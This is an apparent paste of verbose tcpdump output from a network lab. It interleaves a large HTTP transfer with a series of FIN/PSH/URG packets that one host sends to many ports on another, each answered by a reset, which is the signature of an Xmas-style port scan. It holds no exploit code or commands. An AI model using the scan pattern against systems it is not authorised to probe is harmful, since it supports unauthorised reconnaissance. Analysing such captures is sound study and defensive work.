· 4 years ago · Feb 16, 2021, 12:26 AM
1 (6), length 40)
2 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.20221: Flags [FPU], cksum 0x8898 (correct), seq 3180585248, win 1024, urg 0, length 0
300:43:01.227616 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
4 ip-10-10-200-226.eu-west-1.compute.internal.20221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x8cac (correct), seq 0, ack 3180585249, win 0, length 0
500:43:01.240956 IP (tos 0x0, ttl 64, id 24641, offset 0, flags [DF], proto TCP (6), length 68)
6 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x1a81 (correct), seq 10828:10844, ack 25919214, win 6347, options [nop,nop,TS val 3431983964 ecr 997087387], length 16: HTTP
700:43:01.241094 IP (tos 0x0, ttl 64, id 24447, offset 0, flags [DF], proto TCP (6), length 52)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
900:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
10 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
1100:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
1300:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
14 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
1500:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
16 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
1700:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
18 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
1900:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
20 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
2100:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
22 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
2300:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
24 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
2500:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
26 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
2700:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
28 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
2900:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
30 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
3100:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
32 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
3300:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
34 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
3500:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
36 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
3700:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
38 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
3900:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
40 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
4100:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
42 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
4300:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
44 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
4500:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
46 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
4700:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
48 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
4900:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
50 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
5100:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
52 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
5300:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
54 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
5500:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
56 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
5700:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
58 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5900:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
60 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
6100:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
62 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
6300:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
64 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6500:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
66 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6700:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
68 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
6900:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
70 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
7100:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
72 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
7300:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
74 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
7500:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
76 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
7700:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
78 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
7900:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
80 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
8100:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
82 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
8300:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
84 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
8500:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
86 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
8700:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
88 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
8900:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
90 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
9100:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
92 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
9300:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
94 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
9500:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
96 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
9700:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
98 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
9900:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
100 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
10100:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
102 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
10300:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
104 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
10500:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
106 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
10700:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
108 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10900:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
110 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
11100:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
112 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
11300:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
114 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
11500:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
116 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
11700:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
118 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
11900:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
120 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
12100:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
122 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
12300:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
124 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
12500:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
126 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
12700:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
128 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12900:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
130 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
13100:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
132 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
13300:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
134 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
13500:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
136 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
13700:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
138 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
13900:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
140 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
14100:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
142 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
14300:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
144 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
14500:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
146 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
14700:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
148 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
14900:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
150 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
15100:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
152 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
15300:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
154 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
15500:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
156 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
15700:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
158 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
15900:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
160 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
16100:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
162 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
16300:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
164 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
16500:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
166 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
